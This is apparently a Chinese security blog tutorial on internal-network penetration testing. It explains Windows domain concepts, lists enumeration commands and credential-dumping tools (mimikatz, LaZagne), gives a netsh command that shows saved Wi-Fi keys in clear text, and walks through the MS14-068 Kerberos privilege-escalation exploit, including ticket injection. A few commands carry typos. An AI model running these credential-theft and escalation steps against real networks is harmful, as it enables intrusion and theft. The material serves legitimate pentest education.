内网安全之信息收集(手工&工具)&域漏洞利用基础
基本认识
局域网概念:
局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组,局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真通信服务等功能。局域网与外界通信需要公有地址。
工作组:
每一个PC都是一个工作组,自己管理自己,他人无权干涉。
域相关:
域:
域(Domain〉是相对工作组(Workgroup)的概念,形象的说.域就像中央集权,由一台或数台域控制器(Domain Controller〉管理域内的其他计算机:工作组就像各自为政,组内每一台计算机自己管理自己,他人无法干涉。
域是一个计算机群体的组合,是一个相对严格的组织.而域控制器则是这个域内的管理核心。
一般情况下,域控制器集成了DNS服务,可以解析域内的计算机名称〈基于TCP/IP),解决了工作组环境不同网段计算机不能使用计算机名互访的问题。
Active Directory = LDAP服务器+LDAP应用(Windo ws域控)就是Active Directory先实现一个LDAP服务器.然后自己先用这个LDAP服务器实现了自己的一个具体应用(域控)。
AD与DC
如果网络规模较大,这时我们就会考虑把网络中众多的对象(被称之为AD对象):计算机、用户、用户组、打印机、共享夹…分门别类、井然有序地放在一个大仓库中,并做好检索信息,以利于查找、管理和使用这些对象(资源)。这个有层次结构的数据库,就是活动目录数据库(Active Directory),简称AD库。
接下来,我们应该把这个数据库放在哪台计算机上呢?是这样的,我们把存放有活动目录数据库的计算机就称之为域控制器(Domain Controller),简称DC。
域分类:
单域相对较小公司,建立一个域就可以满足需求。在一个域内,一般至少要有至少两台与服务器,一台作为DC,一台作为备份DC。如果没有备份DC,一旦DC瘫痪了,域内其他用户就不能登录该域,影响工作正常运行。
父域和子域处于管理及其他需求.需要在网络中划分多个域.第一个域称为父域,各分部的域称为该域的子域。比如一个大公司各个分公司位于不同的地点,就需要使用父域及子域。还有一种情况出于安全策略的考虑,例如一个公司的财务部希望使用特定的安全策略。
域树多个域通过建立信任关系组成的集合。一般来说域管理员只能管理本域.不能访问或者管理其他域,如果建立信任关系,则就有访问其他域的权限。
域森林多个域树建立信任关系组成的集合。
安全域划分:
DMZ区域一般称为隔离区,作用是解决防火墙后外部网络不能访问内部网络服务的问题而设立的一个非安全系统与安全系统之间的缓冲区,DMZ中可能会放置企业的Web服务器、FTP服务器.邮件服务器等。
内网区域一般分为办公区与核心区。办公区为公司员工日常工作的地方.办公区一般能访问DMZ区域。核心区存储企业重要数据、文档等信息资产。
俗话说知己知彼,在渗透测试中可能有一半时间用于信息收集,信息了解越多攻击的面就有多广,你学的有多深多广决定了你渗透的深度与广度。废话不多说下面看看内网需要做哪些。
内网打点
信息收集:
基本信息
版本信息,补丁信息,服务信息,计划任务,防火墙等
网络信息:
开发端口,网络环境,是否允许外网直接访问
域用户信息:
域用户,本地用户,用户权限,对应组信息
凭据信息:
明文,hash,各种口令
探测周边主机:
存活主机,域控,网络架构,接口
一些常用命令:
systeminfo 查看详细信息
net start 启动服务
tasklist 进程列表
schtasks 计划任务
主机网络接口信息,判断当前角色,功能等
ipconfig/all 判断网络信息与是否存在域
net view /domain 判断是否存在域
net time /domain 判断主域因为有域一般域内主机查看时间回去域控上获取
netstat -ano 当前网络连接情况
nslookup 域名 域名解析
旨在了解当前计算机或域环境下的用户及用户组信息,便于后期利用凭据进行测试系统默认常见用户身份:
Domain Admins:域管理员(默认对域控制器有完全控制权)
Domain computers:域内机器
Domain Controllers:域控制器
Domain Guest:域访客,权限低
Domain Users:域用户
Enterprise Admins:企业系统管理员用户(默认对域控制器有完全控制权)
相关用户收集操作命令:
whoami / all 用户权限
net config workstation登录信息
net user 本地用户
net localgroup本地用户组
net user / domain获取域用户信息
net group / domain获取域用户组信息
wmic useraccount get / all 涉及域用户详细信息
net group "Domain Admins" / domain查询域管理员账户
net group "Enterprise Admins" / domain查询管理员用户组
net group "Domain Controllers" / domain查询域控制器
旨在收集各种密文,明文,口令等,为后续横向渗透做好测试准备
计算机用户HASH,明文获取-mimikatz(win), mimipenguin (linux)
计算机各种协议服务口令获取-Lazagne (all), xenArmor (win )
Netsh wLAN show profiles
Netsh WLAN show profile name="无线名称"key=clear
1.站点源码备份文件、数据库备份文件等
2.各类数据库web管理入口,如PHPMyAdmin3.浏览器保存密码、浏览器cookies
4 .其他用户会话、338s和ipc$连接记录、回收站内容5.windows保存的w工Fr密码
6.网络内部的各种帐号和密码,如: Email、VPN、FTP、oA等
信息收集工具
获取当前用户密码工具Windows
mimikatz,wce,invoke-wCMDump,mimiDbg,LaZagne,nirsoft__oackage,OuarksPWDump fgdump,星号查看器等
Linux
LaZagne
mimipenguin
扩散信息搜集
通过以上本机信息收集,只能对自己的一个情况作为了解,但是如何去了解其他域主机用户甚至域服务器的一些相关信息呢?
假设已经在 Windows 域中取得了普通用户权限,希望在域内横向移动,想知道域内用户登录的位置、他是否是任何系统中的本地管理员、他所归属的组、他是否有权访问文件共享等。枚举主机、用户和组,有助于我们更好地了解域内布局。
如果通过手动去获取这些信息,则是非常麻烦的一件事情,我们可借助工具去快速发现别的域主机用户的一些相关信息。
nbtscan-快速探测内网
用法:nbtscan +网段/掩码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YI3dI6rt-1661097549860)(E:\安全学习\博客\屏幕截图%202022-08-21%20233934.png)]
常用端口扫描工具:
namp
masscan
zmap
nc等
如何定位域控:
1.常用域管理员定位工具 psloggedon.exe pvefindaduser.exe netview.exe nmap,powerview
2.查看域信息net view /domain
3.通过srv工具 nslookup -type=SRV_ldap._tcp.corp
4.使用nltest nltest /dclist:corp
5.使用dsquery DsQuery Server -domain corp
6.使用netdom netdom query pdc
7.查看域时间net time /domain
8.查看dns服务器ipconfig /all
9.获取域控制器(在多域控制器时,并且只能在域控制器上执行)
net group "Domaincontrollers" /domain
域漏洞
ms14-068
MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在域控制器上使用命令检测
systeminfo |find "3011780"则试域控上未安装该补丁,可利用
利用:
利用之前:无法访问共享文件
利用过程:
1.获取域成员sid whomai /all
获取SID
2.生成TGT票据
使用工具
https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
使用方法
ms14-068.exe -u域成员名@域名-s 域成员sid -d域控制器地址-p域成员密码
生成票据成功
3.票据注入
使用mimikatz
mimikatz # kerberospurge //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
mimikatz # kerberos:list//查看当前机器凭证
mimikatz # kerberos:ptc票据文件//将票据注入到内存中
关于kerberos以及票据推荐文章
权限维持专题:域控制器权限维持(下篇) - FreeBuf网络安全行业门户
内网安全防范:
及时更新操作系统漏洞补丁(补丁前需要对系统进行备份.防止崩溃)
对杀毒软件设置管理员密码
定期查看杀毒软件日志和系统日志定期对监控日志进行查看
设置监控和触发报警规则·用攻击的思路来防范
9815
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
